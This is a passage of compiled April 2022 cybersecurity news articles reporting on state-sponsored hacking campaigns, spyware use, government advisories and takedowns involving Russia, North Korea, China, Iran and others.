What's more, a subsequent operational shift observed in February 2022 saw the threat actor pivoting away from BEATDROP in favor of a C++-based loader referred to as BEACON, potentially reflecting the group's ability to periodically alter their TTPs to stay under the radar.
BEACON, programmed in C or C++, is part of the Cobalt Strike framework that facilitates arbitrary command execution, file transfer, and other backdoor functions such as capturing screenshots and keylogging.
The development follows the cybersecurity company's decision to merge the uncategorized cluster UNC2452 into APT29, while noting the highly sophisticated group's propensity for evolving and refining its technical tradecraft to obfuscate activity and limit its digital footprint to avoid detection.
Nobelium, notably, breached multiple enterprises by means of a supply chain attack in which the adversary accessed and tampered with SolarWinds source code, and used the vendor's legitimate software updates to spread the malware to customer systems.
"The consistent and steady advancement in TTPs speaks to its disciplined nature and commitment to stealthy operations and persistence," Mandiant said, characterizing APT29 as an "evolving, disciplined, and highly skilled threat actor that operates with a heightened level of operational security (OPSEC) for the purposes of intelligence collection."
The findings also coincide with a special report from Microsoft, which observed Nobelium attempting to breach IT firms serving government customers in NATO member states, using the access to siphon data from Western foreign policy organizations.
Microsoft Documents Over 200 Cyberattacks by Russia Against Ukraine
29.4.22 BigBrothers Thehackernews
At least six different Russia-aligned actors launched no less than 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country.
"Collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public's trust in those same institutions," the company's Digital Security Unit (DSU) said in a special report.
The major malware families that have been leveraged for destructive activity as part of Russia's relentless digital assaults include: WhisperGate, HermeticWiper (FoxBlade aka KillDisk), HermeticRansom (SonicVote), IssacWiper (Lasainraw), CaddyWiper, DesertBlade, DoubleZero (FiberLake), and Industroyer2.
WhisperGate, HermeticWiper, IssacWiper, and CaddyWiper are all data wipers designed to overwrite data and render machines unbootable, while DoubleZero is a .NET malware capable of data deletion. DesertBlade, also a data wiper, is said to have been launched against an unnamed broadcasting company in Ukraine on March 1.
SonicVote, on the other hand, is a file encryptor detected in conjunction with HermeticWiper to disguise the intrusions as a ransomware attack, while Industroyer2 specifically targets operational technology to sabotage critical industrial production and processes.
Microsoft attributed HermeticWiper, CaddyWiper, and Industroyer2 with moderate confidence to a Russian state-sponsored actor named Sandworm (aka Iridium). The WhisperGate attacks have been tied to a previously unknown cluster dubbed DEV-0586, which is believed to be affiliated to Russia's GRU military intelligence.
32% of the total 38 destructive attacks are estimated to have singled out Ukrainian government organizations at the national, regional, and city levels, with over 40% of the attacks aimed at organizations in critical infrastructure sectors in the nation.
In addition, Microsoft said it observed Nobelium, the threat actor blamed for the 2020 SolarWinds supply chain attack, attempting to breach IT firms serving government customers in NATO member states, using the access to siphon data from Western foreign policy organizations.
Other malicious attacks involve phishing campaigns targeting military entities (Fancy Bear aka Strontium) and government officials (Primitive Bear aka Actinium) as well as data theft (Energetic Bear aka Bromine) and reconnaissance (Venomous Bear aka Krypton) operations.
"Russia's use of cyberattacks appears to be strongly correlated and sometimes directly timed with its kinetic military operations targeting services and institutions crucial for civilians," Tom Burt, corporate vice president of customer security and trust, said.
"Given Russian threat actors have been mirroring and augmenting military actions, we believe cyberattacks will continue to escalate as the conflict rages. It's likely the attacks we've observed are only a fraction of activity targeting Ukraine."
Indian Govt Orders Organizations to Report Security Breaches Within 6 Hours to CERT-In
29.4.22 BigBrothers Thehackernews
India's Computer Emergency Response Team, CERT-In, on Thursday published new guidelines that require service providers, intermediaries, data centers, and government entities to compulsorily report cybersecurity incidents, including data breaches, within six hours.
"Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents," the government said in a release.
The types of incidents that come under the ambit include, inter alia, compromise of critical systems, targeted scanning, unauthorized access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances like routers and IoT devices.
The government said it was taking these steps to ensure that requisite indicators of compromise (IoC) associated with the security events are readily available at hand to "carry out the analysis, investigation and coordination as per the process of law."
The directions also instruct concerned organizations to synchronize ICT system clocks to the Network Time Protocol (NTP) Server of the National Informatics Centre (NIC) or National Physical Laboratory (NPL), maintain logs of ICT systems for a rolling period of 180 days, and require VPN service providers to retain information like names, addresses, phone numbers, emails, and IP addresses of subscribers for a minimum of five years.
Additionally, the rules, which will take effect after 60 days, call for virtual asset service, exchange, and custodian wallet providers to keep records on Know Your Customer (KYC) and financial transactions for a period of five years.
"These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country," India's Ministry of Electronics and Information Technology (MeitY) said in a statement.
U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities
29.4.22 BigBrothers Thehackernews
Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021.
That's according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations: Australia, Canada, New Zealand, the U.K., and the U.S.
Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server (CVE-2020-0688), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure (CVE-2019-11510), and a path traversal defect in Fortinet FortiOS and FortiProxy (CVE-2018-13379).
Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.
"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities," the agencies said in a joint advisory.
"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors."
To mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies recommend that organizations apply patches in a timely fashion and implement a centralized patch management system.
U.S. Offers $10 Million Bounty for Information on 6 Russian Military Hackers
29.4.22 BigBrothers Thehackernews
The U.S. government on Tuesday announced up to $10 million in rewards for information on six hackers associated with the Russian military intelligence service.
"These individuals participated in malicious cyber activities on behalf of the Russian government against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act," the State Department's Rewards for Justice Program said.
All six Russian officers are members of an advanced persistent threat group called Sandworm (aka Voodoo Bear or Iron Viking), which is known to have been operating since at least 2008 with a specific focus on targeting entities in Ukraine with the goal of establishing an illicit, long-term presence in order to mine highly sensitive data.
The hackers, who are officers of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), are as follows -
Artem Valeryevich Ochichenko, who has been linked to technical reconnaissance and spear-phishing campaigns to gain unauthorized access to IT networks of critical infrastructure facilities worldwide
Petr Nikolayevich Pliskin, Sergey Vladimirovich Detistov, Pavel Valeryevich Frolov, and Yuriy Sergeyevich Andrienko, who are said to have developed components of the NotPetya and Olympic Destroyer malware used by the Russian government on June 27, 2017 to infect computer systems, and
Anatoliy Sergeyevich Kovalev, who is accused of developing spear-phishing techniques and messages used by the Russian government to breach computer systems of critical infrastructure facilities
On October 15, 2020, the U.S. Justice Department indicted the aforementioned officers for carrying out destructive malware attacks with an aim to disrupt and destabilize other nations and cause monetary losses, charging them with conspiracy to commit wire fraud and aggravated identity theft.
As part of the initiative, the Rewards for Justice program has set up a Tor website at "he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad[.]onion" that can be used to submit tips about these threat actors anonymously, or alternatively share the information via Signal, Telegram, or WhatsApp.
The Sandworm collective, not long ago, was attributed to a now-neutralized sophisticated botnet malware dubbed Cyclops Blink that ensnared internet-connected firewall devices and routers from WatchGuard and ASUS.
Other recent hacking activities associated with the group include the deployment of an upgraded version of the Industroyer malware against high-voltage electrical substations in Ukraine amidst Russia's ongoing invasion of the country.
Five Eyes Nations Warn of Russian Cyber Attacks Against Critical Infrastructure
23.4.22 BigBrothers Thehackernews
The Five Eyes nations have released a joint cybersecurity advisory warning of increased malicious attacks from Russian state-sponsored actors and criminal groups targeting critical infrastructure organizations amidst the ongoing military siege on Ukraine.
"Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks," authorities from Australia, Canada, New Zealand, the U.K., and the U.S. said.
"Russia's invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as material support provided by the United States and U.S. allies and partners."
The advisory follows another alert from the U.S. government cautioning of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices.
Over the past two months since the invasion commenced, Ukraine has been subjected to a blitzkrieg of targeted campaigns ranging from distributed denial-of-service (DDoS) attacks to the deployment of destructive malware aimed at governmental and infrastructure entities.
Wednesday's alert noted that Russian state-sponsored cyber actors have the ability to compromise IT networks, maintain long-term persistence, steal sensitive data while remaining hidden, and disrupt and sabotage industrial control systems.
Also joining the mix are cybercriminal groups like Conti (aka Wizard Spider), which publicly pledged support for the Russian government. Other Russian-aligned cybercrime syndicates include The CoomingProject, Killnet, Mummy Spider (the operators of Emotet), Salty Spider, Scully Spider, Smoky Spider, and the XakNet Team.
"The message should be loud and clear, Russian nexus-state actors are on the prowl, cyberspace has become a messy, hot war-zone, and everyone should be prepared for an attack from any direction," Chris Grove, director of cybersecurity strategy at Nozomi Networks, said in a statement shared with The Hacker News.
The disclosure comes as the Federal Bureau of Investigation (FBI) warned of increased ransomware attacks likely targeting food and agriculture sector companies during planting and harvest seasons.
"Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production," the agency stated. "Initial intrusion vectors included known but unpatched common vulnerabilities and exploits, as well as secondary infections from the exploitation of shared network resources or compromise of managed services."
In a separate move, the U.S. Treasury Department moved to sanction Russian cryptocurrency mining company Bitriver for helping the country evade sanctions, marking the first time a virtual coin mining firm has come under an economic blocklist. Russia is the world's third-largest country for bitcoin mining.
"By operating vast server farms that sell virtual currency mining capacity internationally, these companies help Russia monetize its natural resources," the Treasury said. "However, mining companies rely on imported computer equipment and fiat payments, which makes them vulnerable to sanctions."
Experts Uncover Spyware Attacks Against Catalan Politicians and Activists
21.4.22 BigBrothers Thehackernews
A previously unknown zero-click exploit in Apple's iMessage was used to install mercenary spyware from NSO Group and Candiru against at least 65 individuals as part of a "multi-year clandestine operation."
"Victims included Members of the European Parliament, Catalan Presidents, legislators, jurists, and members of civil society organizations," the University of Toronto's Citizen Lab said in a new report. "Family members were also infected in some cases."
Of the 65 individuals, 63 were targeted with Pegasus and four others were infected with Candiru, with iPhones belonging to at least two compromised with both. The incidents are said to have mostly occurred between 2017 and 2020.
The attacks involved the weaponization of an iOS exploit dubbed HOMAGE that made it possible to penetrate the devices running versions prior to iOS 13.2, which was released on October 28, 2019. It's worth noting that the latest version of iOS is iOS 15.4.1.
Although the intrusions have not been attributed to a specific government or entity, the Citizen Lab implied a connection to the Spanish authorities based on a "range of circumstantial evidence," citing ongoing tensions between the country and the autonomous community of Catalonia amid calls for Catalan independence.
The findings build on a prior report from The Guardian and El País in July 2020 that revealed a case of domestic political espionage aimed at Catalan pro-independence supporters using a vulnerability in WhatsApp to deliver the Pegasus surveillanceware.
Besides relying on the now-patched WhatsApp vulnerability (CVE-2019-3568), the attacks made use of multiple zero-click iMessage exploits and malicious SMS messages to hack Catalan targets' iPhones with Pegasus over a three-year period.
"The HOMAGE exploit appears to have been in use during the last months of 2019, and involved an iMessage zero-click component that launched a WebKit instance in the com.apple.mediastream.mstreamd process, following a com.apple.private.alloy.photostream lookup for a Pegasus email address," the researchers said.
The issue is believed to have been closed by Apple in iOS 13.2, as the exploit was observed being fired only against devices running iOS versions 13.1.3 and lower. Also put to use was another exploit chain called KISMET that worked against iOS 13.5.1.
On the other hand, the four individuals who were compromised with Candiru's spyware were victims of an email-based social engineering attack designed to trick the victims into opening seemingly legitimate links about COVID-19 and messages impersonating the Mobile World Congress (MWC), an annual trade show that takes place in Barcelona.
Both Pegasus and Candiru's spyware (called DevilsTongue by Microsoft) are engineered to covertly gain extensive access to sensitive information stored in mobile and desktop devices.
"The spyware [...] is capable of reading texts, listening to calls, collecting passwords, tracking locations, accessing the target device's microphone and camera, and harvesting information from apps," the researchers said. "Encrypted calls and chats can also be monitored. The technology can even maintain access to victims' cloud accounts after the infection has ended."
The links to NSO Group's Pegasus and Candiru stem from infrastructure overlaps, with the hacking operations likely the work of a customer with ties to the Spanish government owing to the timing of the attacks and the victimology patterns, the Citizen Lab said.
"The case is notable because of the unrestrained nature of the hacking activities," the researchers concluded.
"If the Spanish government is responsible for this case, it raises urgent questions about whether there is proper oversight over the country's intelligence and security agencies, as well as whether there is a robust legal framework that authorities are required to follow in undertaking any hacking activities."
FBI, U.S. Treasury and CISA Warn of North Korean Hackers Targeting Blockchain Companies
21.4.22 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI) and the Treasury Department, warned of a new set of ongoing cyber attacks carried out by the Lazarus Group targeting blockchain companies.
Calling the activity cluster TraderTraitor, the infiltrations involve the North Korean state-sponsored advanced persistent threat (APT) actor striking entities operating in the Web3.0 industry since at least 2020.
Targeted organizations include cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs).
The attack chains commence with the threat actor reaching out to victims via different communication platforms to lure them into downloading weaponized cryptocurrency apps for Windows and macOS, subsequently leveraging the access to propagate the malware across the network and conduct follow-on activities to steal private keys and initiate rogue blockchain transactions.
"Intrusions begin with a large number of spear-phishing messages sent to employees of cryptocurrency companies," the advisory reads. "The messages often mimic a recruitment effort and offer high-paying jobs to entice the recipients to download malware-laced cryptocurrency applications."
This is far from the first time the group has deployed custom malware to steal cryptocurrency. Other campaigns mounted by the Lazarus Group consist of Operation AppleJeus, SnatchCrypto, and, more recently, making use of trojanized DeFi wallet apps to backdoor Windows machines.
The TraderTraitor threat comprises a number of fake crypto apps that are based on open-source projects and claim to be cryptocurrency trading or price prediction software, only to deliver the Manuscrypt remote access trojan, a piece of malware previously tied to the group's hacking campaigns against the cryptocurrency and mobile games industries.
The list of malicious apps is below -
DAFOM (dafom[.]dev)
TokenAIS (tokenais[.]com)
CryptAIS (cryptais[.]com)
AlticGO (alticgo[.]com)
Esilet (esilet[.]com), and
CreAI Deck (creaideck[.]com)
The disclosure comes less than a week after the Treasury Department attributed the cryptocurrency theft of Axie Infinity's Ronin Network to the Lazarus Group, sanctioning the wallet address used to receive the stolen funds.
"North Korean state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest, acquire sensitive cryptocurrency-intellectual property, and gain financial assets," the agencies said.
"These actors will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime."
Ethereum Developer Jailed 63 Months for Helping North Korea Evade Sanctions
15.4.22 BigBrothers Thehackernews
A U.S. court has sentenced former Ethereum developer Virgil Griffith to five years and three months in prison and ordered him to pay a $100,000 fine for conspiring with North Korea to help it use cryptocurrencies to circumvent sanctions imposed on the country.
"There is no question North Korea poses a national security threat to our nation, and the regime has shown time and again it will stop at nothing to ignore our laws for its own benefit," U.S. Attorney Damian Williams said in a statement.
The sentencing comes more than six months after Griffith pleaded guilty to violating the International Emergency Economic Powers Act (IEEPA) by offering technical advice to the hermit kingdom with regard to the use of digital currency to bypass economic restrictions. Griffith was arrested in November 2019.
North Korea is known to rely on cryptocurrency heists to get around international sanctions and use it to help fund programs to build weapons of mass destruction. Indeed, the nation-state-backed Lazarus Group siphoned an estimated $400 million worth of digital assets from crypto platforms in 2021 alone.
"The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country," Israeli cybersecurity company ClearSky noted in August 2020.
Griffith is said to have conceived plans back in 2018 to develop and fund cryptocurrency infrastructure in North Korea, such as crypto mining, and subsequently provided instructions on how the regime could use blockchain technologies like smart contracts to launder funds.
The 39-year-old defendant, a U.S. citizen and a resident of Singapore, also formulated proposals to facilitate the exchange of digital currency between North and South Korea, and attempted to recruit other U.S. citizens to offer similar services to individuals in the nation.
These actions were carried out despite having been denied permission by the Department of the Treasury's Office of Foreign Assets Control (OFAC), the Justice Department said in the ruling.
"Mr. Griffith admitted in court he took actions to evade sanctions, which are in place to prevent the DPRK from building a nuclear weapon," Williams added. "Justice has been served with the sentence handed down today."
E.U. Officials Reportedly Targeted with Israeli Pegasus Spyware
12.4.22 BigBrothers Thehackernews
Senior officials in the European Union were allegedly targeted with NSO Group's infamous Pegasus surveillance tool, according to a new report from Reuters.
At least five individuals, including European Justice Commissioner Didier Reynders, are said to have been singled out in total, the news agency said, citing documents and two unnamed E.U. officials. However, it's not clear who used the commercial spyware against them or what information was obtained following the attacks.
NSO Group said in a statement shared with Reuters that it was not responsible for the hacking attempts, adding that the targeting "could not have happened with NSO's tools."
The targeting is said to have come to light after Apple notified the victims of state-sponsored attacks last November as part of its efforts to stop the Israeli surveillance firm from targeting its customers.
That same month, the iPhone maker filed a lawsuit against NSO Group, seeking a court-issued injunction aimed at banning the company from using its products and services to develop and launch spyware attacks.
Apple called NSO Group "notorious hackers, amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse."
Pegasus, typically deployed through sophisticated "zero-click" exploits like FORCEDENTRY, grants its government and law enforcement customers complete access to a target's device, including their personal data, photos, messages, and precise location.
The widespread abuse of Pegasus to systematically spy on civil society in recent years has led the U.S. government to add NSO Group to its trade blocklist, in turn prompting Israel to restrict the number of countries to which local security firms can sell offensive hacking and surveillance tools.
In February 2022, the European Data Protection Supervisor called for a ban on the development and the use of Pegasus-like commercial spyware in the region, pointing out the technology's "unprecedented level of intrusiveness" that could endanger users' right to privacy.
But despite attempts to regulate the use of spyware, a forensic investigation released by Front Line Defenders last week found that the iPhone belonging to Suhair Jaradat, a Jordanian journalist and human rights defender, was hacked with Pegasus via a malicious WhatsApp message in December 2021, weeks after Apple initiated legal proceedings.
"The fact that the targeting we uncovered happened after the widespread publicity around Apple's lawsuit and notifications to victims is especially remarkable," the report said.
"A firm that truly respected such concerns would have at least paused operations for government clients, like Jordan, that have a widely publicized track record of human rights concerns and had enacted emergency powers giving authorities widespread latitude to infringe on civil liberties."
Chinese Hacker Groups Continue to Target Indian Power Grid Assets
9.4.22 BigBrothers Thehackernews
China-linked adversaries have been attributed to an ongoing onslaught against Indian power grid organizations, one year after a concerted campaign targeting critical infrastructure in the country came to light.
Most of the intrusions involved ShadowPad, a modular backdoor and sophisticated remote access trojan that has been dubbed a "masterpiece of privately sold malware in Chinese espionage," according to Recorded Future's Insikt Group.
"ShadowPad continues to be employed by an ever-increasing number of People's Liberation Army (PLA) and Ministry of State Security (MSS)-linked groups, with its origins linked to known MSS contractors first using the tool in their own operations and later likely acting as a digital quartermaster," the researchers said.
The goal of the sustained campaign, the cybersecurity company said, is to facilitate intelligence gathering pertaining to critical infrastructure systems in preparation for future contingency operations. The targeting is believed to have commenced in September 2021.
The attacks took aim at seven State Load Despatch Centres (SLDCs) located primarily in Northern India, in particular those close to the disputed India-China border in Ladakh, with one of the targets victimized in a similar attack disclosed in February 2021 and attributed to the RedEcho group.
The 2021 RedEcho attacks involved the compromise of 10 distinct Indian power sector organizations, including six of the country's regional and state load despatch centres (RLDCs), two ports, a national power plant, and a substation.
Recorded Future linked the latest set of malicious activities to an emerging threat cluster it's tracking under the moniker Threat Activity Group 38 aka TAG-38 (similar to the UNC#### and DEV-#### designations given by Mandiant and Microsoft), citing "notable distinctions" from that of the previously identified RedEcho TTPs.
In addition to attacking power grid assets, TAG-38 impacted a national emergency response system and the Indian subsidiary of a multinational logistics company.
Although the initial infection vector used to breach the networks is unknown, the ShadowPad malware on the host systems was commandeered by means of a network of infected internet-facing DVR/IP camera devices geolocated in Taiwan and South Korea.
"The use of ShadowPad across Chinese activity groups continues to grow over time, with new clusters of activity regularly identified using the backdoor as well as continued adoption by previously tracked clusters," the researchers said, adding it's monitoring at least 10 distinct groups with access to the malware.
Following the disclosure, India's Union Power Minister R. K. Singh characterized the intrusions as unsuccessful "probing attempts" at hacking that happened in January and February, and said that the government is constantly reviewing its cybersecurity mechanisms to bolster defenses.
China, for its part, reiterated that it "firmly opposes and combats all forms of cyber attacks" and that "cybersecurity is a common challenge facing all countries that should be jointly addressed through dialogue and cooperation."
"Recently, Chinese cybersecurity companies released a series of reports, revealing that the U.S. government launched cyber attacks on many countries around the world, including China, seriously jeopardizing the security of critical infrastructure of these countries," China's Foreign Ministry spokesperson, Zhao Lijian, said.
"It is worth noting that many U.S. allies or countries with which it cooperates on cyber security are also victims of U.S. cyber attacks. We believe that the international community, especially China's neighboring countries, will keep their eyes wide open and make their own judgment on the true intentions of the U.S. side."
Microsoft Obtains Court Order to Take Down Domains Used to Target Ukraine
9.4.22 BigBrothers Thehackernews
Microsoft on Thursday disclosed that it obtained a court order to take control of seven domains used by APT28, a state-sponsored group operated by Russia's military intelligence service, with the goal of neutralizing its attacks on Ukraine.
"We have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium's current use of these domains and enable victim notifications," Tom Burt, Microsoft's corporate vice president of customer security and trust, said.
APT28, also known by the names Sofacy, Sednit, Pawn Storm, Fancy Bear, Iron Twilight, and Strontium, is a cyber espionage group and an advanced persistent threat that's known to be active since 2009, striking media, governments, military, and international non-governmental organizations (NGOs) that often have a security focus.
The tech giant noted that the sinkholed infrastructure was used by the threat actor to target Ukrainian institutions as well as governments and think tanks in the U.S. and the European Union so as to maintain long term persistent access and exfiltrate sensitive information.
The seizure is part of a long-term investment to systematically dismantle infrastructure used by the threat actor, Microsoft said, adding it has used the expedited legal framework put in place 15 times to take down more than 100 Strontium-controlled domains.
Meta takes action against Ghostwriter and Phosphorus
The disclosure from Microsoft comes as Meta, the company formerly known as Facebook, revealed that it took action against covert adversarial networks originating from Azerbaijan and Iran on its platform, by taking down the accounts and blocking their domains from being shared.
The Azerbaijani operation is believed to have singled out democracy activists, opposition groups, and journalists from the country and government critics abroad for credential phishing and espionage activities.
Another involved UNC788 (aka Charming Kitten, TA453, or Phosphorus), a government-linked hacking crew that has a history of conducting surveillance operations in support of Iranian strategic priorities.
"This group used a combination of low-sophistication fake accounts and more elaborate fictitious personas, which they likely used to build trust with potential targets and trick them into clicking on phishing links or downloading malicious applications," Meta outlined in its first quarterly Adversarial Threat Report.
The malicious Android applications, dubbed HilalRAT, impersonated seemingly harmless Quran apps to extract sensitive information, such as contact lists, text messages, files, and location information, as well as to activate the camera and microphone.
Meta also said it blocked the malicious activities associated with an unreported Iranian hacking group that leveraged tactics similar to that of Tortoiseshell to target or spoof companies in the energy, IT, maritime logistics, semiconductor, and telecom industries.
This campaign featured an elaborate set of bogus profiles on Instagram, LinkedIn, Facebook, and Twitter, with the actors posing as recruiters of real and front companies to trick users into clicking on phishing links that delivered information-stealing malware disguised as VPN, calculator, audiobook, and messaging apps.
"They developed malware on the VMWare ThinApp virtualization platform, which allowed them to run it on many different systems and hold malicious payload back until the last minute, making malware detection more challenging," Meta explained.
Lastly, also disrupted by Meta were takeover attempts made by the Belarus-aligned Ghostwriter group to break into the Facebook accounts of dozens of Ukrainian military personnel.
The attacks, which were successful in a "handful of cases," abused the access to victims' social media accounts and posted disinformation "calling on the Army to surrender as if these posts were coming from the legitimate account owners."
Hamas-linked Hackers Targeting High-Ranking Israelis Using 'Catfish' Lures
9.4.22 BigBrothers Thehackernews
A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations.
"The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason said in a Wednesday report.
"The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes."
The monthslong intrusions, codenamed "Operation Bearded Barbie," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon.
Most recently, the threat actor was held responsible for attacks aimed at Palestinian activists and entities starting around October 2021 using politically-themed phishing emails and decoy documents.
The latest infiltrations are notable for their specific focus on plundering information from computers and mobile devices belonging to Israeli individuals by luring them into downloading trojanized messaging apps, granting the actors unfettered access.
The social engineering attacks involved the use of fake personas on Facebook, relying on the tactic of catfishing to set up fictitious profiles of attractive young women to gain the trust of the targeted individuals and befriend them on the platform.
"After gaining the victim's trust, the operator of the fake account suggests migrating the conversation from Facebook over to WhatsApp," the researchers elaborated. "By doing so, the operator quickly obtains the target's mobile number."
Once the chat shifts from Facebook to WhatsApp, the attackers suggest that the victims install a secure messaging app for Android (dubbed "VolatileVenom") and open a RAR archive file containing explicit sexual content, which leads to the deployment of a malware downloader called Barb(ie).
Other hallmarks of the campaign have included the group leveraging an upgraded arsenal of malware tools, including the BarbWire Backdoor, which is installed by the downloader module.
The malware serves as a tool to completely compromise the victim machine, allowing it to establish persistence, harvest stored information, record audio, capture screenshots, and download additional payloads, all of which is transmitted back to a remote server.
VolatileVenom, on the other hand, is Android spyware that's known to spoof legitimate messaging apps and masquerade as system updates and which has been put to use in different campaigns by Arid Viper since at least 2017.
One such example of a rogue Android app is called "Wink Chat," where victims attempting to sign up to use the application are presented with an error message that "it will be uninstalled," only for it to stealthily run in the background and extract a wide variety of data from the mobile devices.
"The attackers use a completely new infrastructure that is distinct from the known infrastructure used to target Palestinians and other Arabic-speakers," the researchers said.
"This campaign shows a considerable step-up in APT-C-23 capabilities, with upgraded stealth, more sophisticated malware, and perfection of their social engineering techniques which involve offensive HUMINT capabilities using a very active and well-groomed network of fake Facebook accounts that have been proven quite effective for the group."
FBI Shut Down Russia-linked "Cyclops Blink" Botnet That Infected Thousands of Devices
9.4.22 BigBrothers Thehackernews
The U.S. Department of Justice (DoJ) announced that it neutralized Cyclops Blink, a modular botnet controlled by a threat actor known as Sandworm, which has been attributed to the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
"The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command-and-control (C2) of the underlying botnet," the DoJ said in a statement Wednesday.
In addition to disrupting its C2 infrastructure, the operation also closed the external management ports that the threat actor used to establish connections with the firewall appliances, effectively severing contact and preventing the hacking group from using the infected devices to commandeer the botnet.
The March 22 court-authorized disruption of Cyclops Blink comes a little over a month after intelligence agencies in the U.K. and the U.S. described the botnet as a replacement framework for the VPNFilter malware that was exposed and sinkholed in May 2018.
Cyclops Blink, which is believed to have emerged as early as June 2019, primarily targeted WatchGuard firewall appliances and ASUS routers, with the Sandworm group leveraging a previously identified security vulnerability in WatchGuard's Firebox firmware as an initial access vector.
A follow-up analysis by cybersecurity firm Trend Micro last month suggested the possibility that the botnet is an attempt to "build an infrastructure for further attacks on high-value targets."
"These network devices are often located on the perimeter of a victim's computer network, thereby providing Sandworm with the potential ability to conduct malicious activities against all computers within those networks," the DoJ added.
Details of the security flaw were never made public beyond the fact that the company addressed the issue as part of software updates issued in May 2021, with WatchGuard noting to the contrary that the vulnerabilities were internally detected and that they were not "actively found in the wild."
The company has since revised its Cyclops Blink FAQs to spell out that the vulnerability in question is CVE-2022-23176 (CVSS score: 8.8), which could "allow an unprivileged user with access to Firebox management to authenticate to the system as an administrator" and gain unauthorized remote access.
ASUS, for its part, has released firmware patches as of April 1, 2022, to block the threat, recommending users to update to the latest version.
Ukraine Warns of Cyber attack Aiming to Hack Users' Telegram Messenger Accounts
6.4.22 BigBrothers Thehackernews
Ukraine's technical security and intelligence service is warning of a new wave of cyber attacks that are aimed at gaining access to users' Telegram accounts.
"The criminals sent messages with malicious links to the Telegram website in order to gain unauthorized access to the records, including the possibility to transfer a one-time code from SMS," the State Service of Special Communication and Information Protection (SSSCIP) of Ukraine said in an alert.
The attacks, which have been attributed to a threat cluster called "UAC-0094," originate with Telegram messages alerting recipients that a login had been detected from a new device located in Russia and urging the users to confirm their accounts by clicking on a link.
The URL, in reality a phishing domain, prompts the victims to enter their phone numbers as well as the one-time passwords sent via SMS that are then used by the threat actors to take over the accounts.
The modus operandi mirrors that of an earlier phishing attack that was disclosed in early March that leveraged compromised inboxes belonging to different Indian entities to send phishing emails to users of Ukr.net to hijack the accounts.
In another social engineering campaign observed by Ukraine's Computer Emergency Response Team (CERT-UA), war-related email lures were sent to Ukrainian government agencies to deploy a piece of espionage malware.
The emails come with an HTML file attachment ("War Criminals of the Russian Federation.htm") which, when opened, culminates in the download and execution of a PowerShell-based implant on the infected host.
CERT-UA attributed the attack to Armageddon, a Russia-based threat actor with ties to the Federal Security Service (FSB) that has a history of striking Ukrainian entities since at least 2013.
In February 2022, the hacking group was connected to espionage attacks targeting government, military, non-government organizations (NGO), judiciary, law enforcement, and non-profit organizations with the main goal of exfiltrating sensitive information.
Armageddon, also known by the moniker Gamaredon, is also believed to have singled out Latvian government officials as part of a related phishing attack towards the end of March 2022, employing war-themed RAR archives to deliver malware.
Other phishing campaigns documented by CERT-UA in recent weeks have deployed a variety of malware, including GraphSteel, GrimPlant, HeaderTip, LoadEdge, and SPECTR, not to mention a Ghostwriter-spearheaded operation to install the Cobalt Strike post-exploitation framework.
The GrimPlant and GraphSteel attacks, associated with a threat actor called UAC-0056 (aka SaintBear, UNC2589, TA471), are believed to have commenced in early February 2022, according to SentinelOne, which described the payloads as pernicious binaries designed to conduct reconnaissance, credential harvesting, and run arbitrary commands.
SaintBear is also assessed to have been behind the WhisperGate activity in early January 2022 impacting government agencies in Ukraine, with the actor preparing the infrastructure for the GrimPlant and GraphSteel campaign beginning in December 2021.
